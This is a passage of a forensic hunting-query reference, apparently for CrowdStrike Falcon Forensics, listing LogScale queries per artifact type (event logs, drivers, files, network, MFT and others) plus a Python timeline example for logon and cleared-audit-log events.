#event_simpleName=SignInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MD5HashData, SHA1HashData, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

Drives

Show all fields for FsVolumeMounted

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Flags, VolumeIsNetwork, VolumeMountPoint, VolumeDriveLetter, VolumeFileSystemFlagString, VolumeOptions, VolumeAppearanceTime, VolumeBusName, VolumeBusPath, VolumeDeviceInternal, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceVendor, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDName, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaPath, VolumeMediaRemovable, VolumeMediaSize, VolumeMediaSizeString, VolumeMediaUUID, VolumeMediaWhole, VolumeMediaWritable, VolumeName, VolumeType, VolumeUUID, VolumeSectorSize, VolumeFreeBytes, VolumeFreeBytesString, FileNameMaxLength, FfcVolumeDeviceType, VolumeRealDeviceName, VolumeSerialNumber], limit=max)

Drivers

Show all fields for DriverLoad events

#event_simpleName=DriverLoad ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, ImageFileName, ImageBaseAddress], limit=max)

Env

Show all fields for RuntimeEnvironmentVariable

#event_simpleName=RuntimeEnvironmentVariable ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, EnvironmentVariableName, EnvironmentVariableValue], limit=max)

Events

Show all fields for LogEntry

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ForensicsText, FfcStructuredLogEntry, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber], limit=max)

Show only login events

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogEventId=528 OR FfcLogEventId=4624 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber, FfcStructuredLogEntry, ForensicsText], limit=max)

Show Service Control Manager Events

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogName=System FfcLogOrigin = "Service Control Manager" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber, FfcStructuredLogEntry, ForensicsText], limit=max)

Show Audit Logs Cleared

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | (FfcLogOrigin="Microsoft-Windows-Eventlog" FfcLogEventId=1102) OR (FfcLogOrigin=Security FfcLogEventId=517) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber, FfcStructuredLogEntry, ForensicsText], limit=max)
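The logon and audit-log-cleared selections above can also be applied offline to exported LogEntry results, which is useful when several collections have to be compared side by side. The following Python is an added example, not CrowdStrike's code; it assumes the records were exported (for instance as JSON) with the same field names the LogEntry queries use (ContextTimeStamp in epoch seconds, FfcLogOrigin, FfcLogEventId, ComputerName, ForensicsText), and the sample records in it are constructed.

```python
"""Timeline of Windows logon and audit-log-cleared entries from Falcon
Forensics LogEntry records.

Added example, not CrowdStrike's code. It assumes LogEntry results have
been exported (for instance as JSON) with the same field names the
LogEntry queries above use: ContextTimeStamp (epoch seconds),
FfcLogOrigin, FfcLogEventId, ComputerName and ForensicsText.
"""
from datetime import datetime, timezone

# Constructed sample records for illustration; not real telemetry.
SAMPLE_LOG_ENTRIES = [
    {"aid": "host-a", "ComputerName": "WS01", "ContextTimeStamp": 1700000000,
     "FfcLogName": "Security", "FfcLogOrigin": "Microsoft-Windows-Security-Auditing",
     "FfcLogEventId": 4624, "ForensicsText": "An account was successfully logged on."},
    {"aid": "host-a", "ComputerName": "WS01", "ContextTimeStamp": 1700000300,
     "FfcLogName": "Security", "FfcLogOrigin": "Microsoft-Windows-Eventlog",
     "FfcLogEventId": 1102, "ForensicsText": "The audit log was cleared."},
    {"aid": "host-b", "ComputerName": "WS02", "ContextTimeStamp": 1699999000,
     "FfcLogName": "Security", "FfcLogOrigin": "Security",
     "FfcLogEventId": 517, "ForensicsText": "The audit log was cleared."},
    {"aid": "host-b", "ComputerName": "WS02", "ContextTimeStamp": 1700000100,
     "FfcLogName": "System", "FfcLogOrigin": "Service Control Manager",
     "FfcLogEventId": 7045, "ForensicsText": "A service was installed in the system."},
]

# Same selections as the queries above: 528 (pre-Vista) and 4624 are
# successful logons; 1102 (Microsoft-Windows-Eventlog) and 517 (legacy
# Security log) record that the audit log was cleared.
LOGON_EVENT_IDS = {528, 4624}
AUDIT_CLEARED = {("Microsoft-Windows-Eventlog", 1102), ("Security", 517)}


def format_context_time(epoch_seconds):
    """Mirror parseTimeStamp(format=seconds) + formatTime("%F %T"), in UTC."""
    ts = datetime.fromtimestamp(int(epoch_seconds), tz=timezone.utc)
    return ts.strftime("%Y-%m-%d %H:%M:%S")


def is_logon(rec):
    return int(rec["FfcLogEventId"]) in LOGON_EVENT_IDS


def is_audit_cleared(rec):
    return (rec["FfcLogOrigin"], int(rec["FfcLogEventId"])) in AUDIT_CLEARED


def build_timeline(records, predicate):
    """Rows (time, aid, ComputerName, origin, event id, text) sorted by time,
    the same leading columns the table() in the queries above produces."""
    rows = [
        (format_context_time(r["ContextTimeStamp"]), r["aid"], r["ComputerName"],
         r["FfcLogOrigin"], int(r["FfcLogEventId"]), r["ForensicsText"])
        for r in records if predicate(r)
    ]
    return sorted(rows)


def hosts_with_cleared_logs(records):
    """Agent IDs on which an audit-log-cleared entry was collected: a gap in
    the logon timeline on these hosts may be evidence removal, not quiet."""
    return {r["aid"] for r in records if is_audit_cleared(r)}


if __name__ == "__main__":
    for row in build_timeline(SAMPLE_LOG_ENTRIES, is_audit_cleared):
        print(*row, sep=" | ")
    print("hosts with cleared audit logs:",
          sorted(hosts_with_cleared_logs(SAMPLE_LOG_ENTRIES)))
```

Run the logon timeline and the cleared-log set together: a host that appears in `hosts_with_cleared_logs` should have its logon history treated as incomplete, since the 1102/517 entry itself survives in the collected log but anything before it does not.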

Firewall

Show all fields for FirewallRuleInfo

#event_simpleName=FirewallRuleInfo
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, ForensicsCollectionIdentifier, FirewallRuleName,
Description, FirewallRuleEnabled, RuleAction, FirewallRuleGrouping,
FirewallRuleIcmpTypeCode, ImageFileName, ServiceDisplayName, ConnectionDirection,
FirewallRuleEdgeTraversal, FirewallRuleInterfaces, FirewallRuleInterfaceTypes,
LocalAddressString, LocalPorts, NetworkProfile, Protocol, RemoteAddressString,
RemotePorts], limit=max)

Files

Show all fields for FilesStatisticInfo

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Show Created, Modified, Accessed file statistics

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_CREATED" OR FilesStatisticType = "RAW_MODIFIED" OR FilesStatisticType = "RAW_ACCESSED" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max) | sort(field=FilesStatisticType, limit=max)

Show file statistics of type RAW_EXTENSIONS (counts per file extension)

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_EXTENSIONS" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Show file statistics of type RAW_SIZES (counts per file size bucket)

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_SIZES" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Show counts of known ransomware file extensions

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_EXTENSIONS" | (FilesStatisticName=".locky" OR FilesStatisticName=".crypt" OR FilesStatisticName=".locked" OR FilesStatisticName=".dharma" OR FilesStatisticName=".zzzzzz") | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Groups

Show all fields for LocalGroupIdentity

#event_simpleName=LocalGroupIdentity ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserGroupName, GID, GroupMemberUIDs, UserName, UserSid], limit=max)

Handles

Show all fields for ProcessHandleTableEntry

#event_simpleName=ProcessHandleTableEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ProcessHandleID, TargetProcessId, TargetProcessName, ProcessHandleType, ProcessHandleName], limit=max)

Jobs

Show all fields for AtJobInfo

#event_simpleName=AtJobInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, CommandLine, AtJobId, AtJobTime, AtJobDaysOfMonth, AtJobDaysOfWeek, AtJobProperties], limit=max)

Jumplist

Show all fields for JumpListInfo

#event_simpleName=JumpListInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, JumpListFileName, TargetFileName, TargetFileIdentifier, FfcFileIdentifier, JumpListApplicationId, JumpListApplication, JumpListType, CommandLineParameters, CommonNetworkRelativeLink, CommonPathSuffix, Description, DescriptionLocation, LinkTargetEmbedSize, HotKey, IconFile, IconIndex, ShowWindowFlags, VolumeName, CommandWorkingDirectory, AutoAccessCount, AutoEntryId, AutoBirthDroidFileId, AutoBirthDroidMacAddress, AutoBirthDroidTime, AutoDroidFileId, AutoDroidMacAddress, AutoDroidTime, AutoInteractionCount, AutoLastModificationTime, AutoNetBiosName, AutoPinned, AutoBirthDroidVolumeId, AutoDroidVolumeId, CustomCategoryIdentifier, CustomCategoryName, CustomCategoryType, CustomVersion], limit=max)

Link

Show all fields for LinkFileInfo

#event_simpleName=LinkFileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, LinkName, TargetFileName, TargetFileIdentifier, FfcFileIdentifier, LinkTargetEmbedSize, CommandLineParameters, CommandWorkingDirectory, Description, DescriptionLocation, Hotkey, IconFile, IconIndex, ShowWindowFlags], limit=max)

Magic

Show all fields for FileSignatureMismatch

#event_simpleName=FileSignatureMismatch ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TotalCount, FileExtension, FileHeader, TargetFileName, FfcFileIdentifier, LooksLikeExtensions], limit=max)

Show all fields for FileSignatureStatistics

#event_simpleName=FileSignatureStatistics ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TotalCount, FileHeader, FileExtension, LooksLikeExtensions], limit=max)

Show files that look like executables

#event_simpleName=FileSignatureStatistics ForensicsCollectionIdentifier=* | LooksLikeExtensions="exe,dll,com,cpl,drv,fon,mui,ocx,scr,sys,tlb" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TotalCount, FileHeader, FileExtension, LooksLikeExtensions], limit=max)

Mal

Show All Fields for MalPaths

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show DLLINPATH MalType

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType=DLLINPATH | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show DLLSVCHOST MalType

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType = DLLSVCHOST | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show STICKYKEY MalType

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType=STICKYKEY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show integrity vulnerable STICKYKEY

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType=STICKYKEY IntegrityVulnerable=1 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

MFT

Show all fields for MftBootSector

#event_simpleName=MftBootSector ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, NtfsSectorsPerCluster, NtfsSectorsPerTrack, NtfsVolumeTotalSectors, NtfsVolumeSerialNumer, NtfsClustersPerIndexBlock, MftFileRecordSize, MftIndexRecordSize, MftClusterBlockNumber, MftClusterMirrorBlockNumber], limit=max)

Show all Fields for MftRecord

#event_simpleName=MftRecord ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, MftRecordId, MftSectorAddress, TargetFileName, MftFileInUse, MftFileAttributesFn, MftFileAttributesSi, FileIsDirectory, MftFileSize, MftValidFileSize], limit=max)

Network

The Network module is a lengthy section, so it is split into IPv4, IPv6, DNS, ARP, UDP and Hosts File subsections for ease of use.

IPv4

Show all fields for LocalIpAddressIP4

#event_simpleName=LocalIpAddressIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP4, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier, #event_simpleName, name], limit=max)

Show all fields for NetworkListenIP4

#event_simpleName=NetworkListenIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkReceiveAcceptIP4

#event_simpleName=NetworkReceiveAcceptIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkConnectIP4

#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkCloseIP4

#event_simpleName=NetworkCloseIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for RouteIP4

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

NetworkStatisticsIP4

#event_simpleName=NetworkStatisticsIP4 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, DefaultTTL, Forwarding, ForwDatagrams, FragCreates, FragOks, FragFails, InAddressErrors, InDelivers, InDiscards, InHeaderErrors, InReceives, InUnknownProtos, NumIPAddresses, NumInterfaces, NumRoutes, OutDiscards, OutNoRoutes, OutRequests, ReasmFails, ReasmOks, ReasmReqds, ReasmTimeout, RoutingDiscards], limit=max)

NetworkStatisticsTCP4

#event_simpleName=NetworkStatisticsTCP4 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, ActiveOpens, AttemptFails, CurrEstabConnections, EstabResets, InErrors, InSegs, MaxConnections, CurrentConnections, OutSegs, OutSegsResets, PassiveOpens, ReTxSegs, ReTxTimeOutAlgorithm, ReTxTimeOutMax, ReTxTimeOutMin], limit=max)

IPv6

Show all fields for LocalIpAddressIP6

#event_simpleName=LocalIpAddressIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP6, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier, #event_simpleName, name], limit=max)

Show all fields for NetworkListenIP6

#event_simpleName=NetworkListenIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkReceiveAcceptIP6

#event_simpleName=NetworkReceiveAcceptIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkConnectIP6

#event_simpleName=NetworkConnectIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkCloseIP6

#event_simpleName=NetworkCloseIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for RouteIP6

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

NetworkStatisticsIP6

#event_simpleName=NetworkStatisticsIP6 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, DefaultTTL, Forwarding, ForwDatagrams, FragCreates, FragOks, FragFails, InAddressErrors, InDelivers, InDiscards, InHeaderErrors, InReceives, InUnknownProtos, NumIPAddresses, NumInterfaces, NumRoutes, OutDiscards, OutNoRoutes, OutRequests, ReasmFails, ReasmOks, ReasmReqds, ReasmTimeout, RoutingDiscards], limit=max)

NetworkStatisticsTCP6

#event_simpleName=NetworkStatisticsTCP6 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, ActiveOpens, AttemptFails, CurrEstabConnections, EstabResets, InErrors, InSegs, MaxConnections, CurrentConnections, OutSegs, OutSegsResets, PassiveOpens, ReTxSegs, ReTxTimeOutAlgorithm, ReTxTimeOutMax, ReTxTimeOutMin], limit=max)

DNS

Show all fields for DnsServer

#event_simpleName=DnsServer ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, ServerIP4Address, ServerIP6Address], limit=max)

Show all fields for NetworkDnsSuffix

#event_simpleName=NetworkDnsSuffix ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, DnsSuffix], limit=max)

Show all fields for DnsCache

#event_simpleName=DnsCache ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, RequestType, DomainName, ResourceTtl, FirstIp4Record, IP4Records, FirstIP6Record, IP6Records, CNAMERecords], limit=max)

ARP

Show all fields for NeighborListIP4

#event_simpleName=NeighborListIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, InterfaceIndex, NeighborList], limit=max)

Show all fields for NeighborListIP6

#event_simpleName=NeighborListIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, InterfaceIndex, NeighborList], limit=max)

UDP

NetworkStatisticsUDP4

#event_simpleName=NetworkStatisticsUDP4 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, InDatagrams, InErrors, NoPorts, NumUDPAddresses, OutDatagrams], limit=max)

NetworkStatisticsUDP6

#event_simpleName=NetworkStatisticsUDP6 ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, InDatagrams, InErrors, NoPorts, NumUDPAddresses, OutDatagrams], limit=max)

Hosts File

Show all fields for NetworkHostsFileEntry

#event_simpleName=NetworkHostsFileEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, DomainName, RemoteAddressIP4, RemoteAddressIP6], limit=max)

PCA

Show all fields for PcaAppLaunchEntry

#event_simpleName=PcaAppLaunchEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, SourceFileName, Line, CommandLine, ImageFileName, FfcFileIdentifier], limit=max)

Show all fields for PcaGeneralDbEntry

